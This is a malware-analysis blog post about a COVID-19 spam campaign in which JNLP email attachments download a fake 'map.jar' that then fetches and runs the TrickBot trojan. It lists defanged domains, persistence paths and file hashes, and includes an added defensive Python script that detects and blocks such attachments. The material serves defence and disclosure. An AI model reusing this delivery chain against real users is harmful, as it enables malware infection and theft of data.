TrickBot Disguised as COVID-19 Map

Cybercriminals are continuously exploiting the Coronavirus (COVID-19) pandemic. While monitoring COVID-19-related spam, we recently spotted an interesting campaign that uses an unusual email attachment to deliver the TrickBot malware.

Figure 1: The spam campaign flow


The Road to TrickBot

The email, claiming to be from a volunteer organization that helps those seeking COVID-19 financial aid, entices the recipient to open the attachments – fake COVID-19 forms.


Figure 2: Trustwave Security Email Gateway displaying a recent COVID-19 spam


The attachments are Java Network Launch Protocol (JNLP) files. JNLP files are XML-formatted files that can be used to launch Java programs hosted on a remote server on the client machine. If the client machine has a Java Runtime Environment (JRE) installed, a JNLP file can be executed with a double click, because the JRE includes Java Web Start, which runs such files.

In Figure 2, the two JNLP attachments are identical. Once executed, they download and run the Java program “map.jar” hosted at “http[s]://mapcovid[.]net” – a second-stage downloader disguised as a COVID-19 "Map" Java program.
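The following inspector, added here as an example and not code from the original post or from Trustwave, shows what a gateway or triage script can pull out of a JNLP attachment: the remote codebase, every jar the JRE would fetch, the main class and whether the file asks for all-permissions. The sample JNLP is constructed to mirror the structure described above; its host name is a placeholder, not the campaign's domain.

```python
"""Detect JNLP email attachments and extract the remote jar they would launch."""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlparse

# Constructed sample modelled on the attachment structure described in the post:
# a remote codebase, one jar to fetch and a main class. The host is a placeholder.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="https://jar-host.example.invalid/" href="SARS-2_Form.jnlp">
  <information><title>COVID-19 Form</title><vendor>Volunteer Org</vendor></information>
  <security><all-permissions/></security>
  <resources><j2se version="1.6+"/><jar href="map.jar" main="true"/></resources>
  <application-desc main-class="Map"/>
</jnlp>
"""


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked when pasted into a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def inspect_jnlp(data: bytes) -> dict:
    """Return what a JNLP file would do, or {'is_jnlp': False} for non-JNLP input.

    A JNLP is treated as suspicious when it fetches any jar from a remote host;
    all-permissions additionally means the jar would run outside the sandbox.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return {"is_jnlp": False}
    if root.tag != "jnlp":
        return {"is_jnlp": False}
    codebase = root.get("codebase", "")
    jars = [urljoin(codebase, j.get("href", "")) for j in root.iter("jar")]
    hosts = sorted({h for h in (urlparse(u).hostname for u in jars) if h})
    desc = root.find("application-desc")
    return {
        "is_jnlp": True,
        "codebase": codebase,
        "jar_urls": jars,
        "remote_hosts": hosts,
        "main_class": desc.get("main-class", "") if desc is not None else "",
        "all_permissions": root.find("security/all-permissions") is not None,
        "suspicious": bool(hosts),
    }


def should_block(filename: str, data: bytes) -> bool:
    """Gateway rule: block by extension (as the post recommends) or by content."""
    return filename.lower().endswith(".jnlp") or inspect_jnlp(data).get("suspicious", False)
```

Checking the content as well as the extension catches a JNLP that arrives under a renamed file name; the extracted jar URLs, defanged, are what you would hand to the proxy block list.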


Figure 3: The attachment SARS-2_Form.jnlp, a fake COVID-19 form, is a downloader
Figure 4: The second stage downloader “map.jar” will download and execute the main malware “map.exe”


The downloaded file “map.jar” will launch the World Health Organization’s (WHO) “Q&A on coronaviruses (COVID-19)” webpage to cover up its malicious behavior – the downloading and installation of the main malware. This malware, concealed as a COVID-19 “Map” executable, will be downloaded from “http[s]://basecovid[.]com/map[.]exe” then saved and executed as %appdata%/map.exe.

The second downloaded file, “map.exe”, is the modular banking trojan TrickBot. This malware is prominent nowadays because of its wide range of functionality: stealing information, downloading other malware, sending spam email, and more.

The TrickBot binary %appdata%/map.exe is executed automatically by the Execute() function of “map.jar”. Once run, it creates its installation folder, SpotifyMusic, in the Startup folder and drops a copy of itself there. It also creates an encrypted file, “settings.ini”, that holds the TrickBot configuration.


Figure 5: Installation path of the downloaded TrickBot
Figure 6: Decrypted TrickBot configuration


The decrypted TrickBot configuration contains the vital information the TrickBot executable uses when it communicates with its C&Cs: the version of the currently installed “map.exe” and its group tag <gtag>, the list of C&C IP addresses, and the first module that “map.exe” will download.

Figure 7: The memory dump of TrickBot “map.exe” showing the first request to its C&C



Malware authors are continuously taking advantage of the COVID-19 pandemic in their spam. Like other cybercriminals, the threat actors behind this TrickBot campaign are unleashing their creativity in crafting the initial arrival vector of their malware. Often, we observe TrickBot being delivered as the payload of malicious document attachments, particularly macro downloaders. This is the first time we have witnessed TrickBot use JNLP files as downloaders. In fact, the use of JNLP files as email attachments to deliver malware is not common.

It’s likely we shall see more of this kind of threat. We would recommend blocking *.jnlp files at your email gateway. We have added protections for this threat to the Trustwave Secure Email Gateway for our customers.



SARS-2_Form.jnlp    SHA1: 46576bfebaecaacc4600bba429016b0713238f52
map.jar    SHA1: 0068154fbc4374642ebe50ac4f822c64b45635c8
map.exe    SHA1: 55b031294ff24919547cfcb4fd4f10a02902ce3b
